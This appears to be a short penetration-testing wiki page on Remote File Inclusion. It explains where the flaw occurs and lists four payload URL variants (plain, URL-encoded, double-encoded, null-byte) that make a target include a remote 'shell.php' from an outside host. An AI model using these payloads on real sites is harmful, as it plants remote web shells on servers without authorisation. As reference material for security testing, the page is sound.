search

Remote File Inclusion

hashtag
Remote File Inclusion (RFI)

hashtag
Introduction

Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts.

hashtag
Where to find

  • Any endpoint that includes a file from a web server. For example, /index.php?page=index.html

hashtag
How to exploit

  1. Basic payload

http://example.com/index.php?page=http://daffa.info/shell.php

  1. URL encoding

http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php

  1. Double encoding

http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php

  1. Using Null Byte (%00)

http://example.com/index.php?page=http://daffa.info/shell.php%00

hashtag
References

PreviousReflected File DownloadNextSQL Injection

Last updated